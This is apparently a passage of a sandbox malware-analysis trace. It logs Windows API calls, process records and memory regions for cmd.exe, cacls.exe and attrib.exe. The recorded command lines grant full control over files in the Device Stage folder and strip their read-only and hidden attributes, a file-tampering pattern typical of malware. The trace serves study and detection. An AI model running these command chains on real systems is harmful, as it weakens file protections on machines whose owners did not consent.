dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f414*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\" /E /G EEBsYm5:F /C 
", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f460 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x30f460*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc00, dwThreadId=0xb7c)) returned 1 [0148.986] CloseHandle (hObject=0x4c) returned 1 [0148.986] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0148.986] GetEnvironmentStringsW () returned 0x4204e0* [0148.986] FreeEnvironmentStringsW (penv=0x4204e0) returned 1 [0148.986] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0149.038] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30f354 | out: lpExitCode=0x30f354*=0x0) returned 1 [0149.038] CloseHandle (hObject=0x50) returned 1 [0149.038] _vsnwprintf (in: _Buffer=0x30f49c, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f360 | out: _Buffer="00000000") returned 8 [0149.038] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0149.038] GetEnvironmentStringsW () returned 0x422300* [0149.038] FreeEnvironmentStringsW (penv=0x422300) returned 1 [0149.038] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0149.039] GetEnvironmentStringsW () returned 0x422300* [0149.039] FreeEnvironmentStringsW (penv=0x422300) returned 1 [0149.039] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f3b8 | out: lpAttributeList=0x30f3b8) [0149.039] GetConsoleTitleW (in: lpConsoleTitle=0x30f79c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.039] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0149.039] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0149.039] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0149.039] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x30f038, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f038) returned 0xffffffff [0149.040] GetLastError () returned 0x2 [0149.040] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x30f038, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f038) returned 0xffffffff [0149.040] GetLastError () returned 0x2 [0149.040] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x30f038, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f038) returned 0x41e540 [0149.040] FindClose (in: hFindFile=0x41e540 | out: hFindFile=0x41e540) returned 1 [0149.040] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x30f038, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f038) returned 0xffffffff [0149.040] GetLastError () returned 0x2 [0149.040] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x30f038, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f038) returned 0x41e540 [0149.040] FindClose (in: hFindFile=0x41e540 | out: hFindFile=0x41e540) returned 1 [0149.040] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0149.040] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0149.040] GetConsoleTitleW (in: 
lpConsoleTitle=0x30f530, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.041] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f3b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f480 | out: lpAttributeList=0x30f3b8, lpSize=0x30f480) returned 1 [0149.041] UpdateProcThreadAttribute (in: lpAttributeList=0x30f3b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f478, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f3b8, lpPreviousValue=0x0) returned 1 [0149.041] GetStartupInfoW (in: lpStartupInfo=0x30f374 | out: lpStartupInfo=0x30f374*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0149.041] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0149.041] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f414*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f460 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device 
Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\"", lpProcessInformation=0x30f460*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb20, dwThreadId=0xafc)) returned 1 [0149.042] CloseHandle (hObject=0x50) returned 1 [0149.042] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0149.042] GetEnvironmentStringsW () returned 0x422460* [0149.042] FreeEnvironmentStringsW (penv=0x422460) returned 1 [0149.043] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0149.084] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x30f354 | out: lpExitCode=0x30f354*=0x0) returned 1 [0149.084] CloseHandle (hObject=0x4c) returned 1 [0149.084] _vsnwprintf (in: _Buffer=0x30f49c, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f360 | out: _Buffer="00000000") returned 8 [0149.084] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0149.084] GetEnvironmentStringsW () returned 0x422460* [0149.084] FreeEnvironmentStringsW (penv=0x422460) returned 1 [0149.084] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0149.084] GetEnvironmentStringsW () returned 0x422460* [0149.084] FreeEnvironmentStringsW (penv=0x422460) returned 1 [0149.084] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f3b8 | out: lpAttributeList=0x30f3b8) [0149.084] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.084] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0149.084] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.084] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0149.085] _get_osfhandle (_FileHandle=0) returned 0x3 [0149.085] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0149.085] SetConsoleInputExeNameW () returned 0x1 [0149.085] GetConsoleOutputCP () returned 0x1b5 [0149.085] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0149.085] 
SetThreadUILanguage (LangId=0x0) returned 0x409 [0149.085] exit (_Code=0) Process: id = "225" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea167a0" os_pid = "0xc00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "224" os_parent_pid = "0xb00" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18995 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18996 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18997 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18998 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 18999 start_va = 0x690000 end_va = 0x698fff entry_point = 0x690000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 19000 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: 
id = 19001 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19002 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19003 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 19004 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19005 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19006 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19007 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19008 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 19009 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 19010 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19011 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 
19012 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19013 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 19014 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19015 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 19016 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 285 os_tid = 0xb7c Thread: id = 286 os_tid = 0xb6c Process: id = "226" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167a0" os_pid = "0xb20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "224" os_parent_pid = "0xb00" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] 
Region: id = 19017 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19018 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19019 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19020 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 19021 start_va = 0x320000 end_va = 0x326fff entry_point = 0x320000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 19022 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19023 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19024 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19025 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 19026 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19027 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19028 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19029 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 19030 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19031 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 19032 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 19033 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19034 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 19035 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19036 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19037 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 19038 start_va = 0x76a90000 end_va 
= 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19039 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19040 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19041 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 19042 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19043 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19044 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 19045 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19046 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 287 os_tid = 0xafc Process: id = "227" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid 
= "0xc10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19047 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19048 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19049 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19050 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 19051 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 19052 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19053 start_va = 
0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19054 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19055 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 19056 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19057 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19058 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19059 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 19060 start_va = 0x260000 end_va = 0x2c6fff entry_point = 0x260000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19061 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 19062 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 19063 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19064 start_va 
= 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19065 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19066 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19067 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19068 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19069 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19070 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19071 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 19072 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19073 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" 
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 19074 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 19075 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 19076 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 19077 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 19078 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 19079 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 19080 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 19089 start_va = 0x12f0000 end_va = 0x15befff entry_point = 0x12f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 288 os_tid = 0x390 [0149.133] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fda4 | out: lpSystemTimeAsFileTime=0x14fda4*(dwLowDateTime=0x92d38f40, dwHighDateTime=0x1d440a9)) [0149.133] GetCurrentProcessId () returned 0xc10 [0149.133] GetCurrentThreadId () returned 0x390 [0149.133] GetTickCount () returned 0x2e37b [0149.133] QueryPerformanceCounter (in: lpPerformanceCount=0x14fd9c | out: lpPerformanceCount=0x14fd9c*=20592272459) returned 1 [0149.134] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0149.134] __set_app_type 
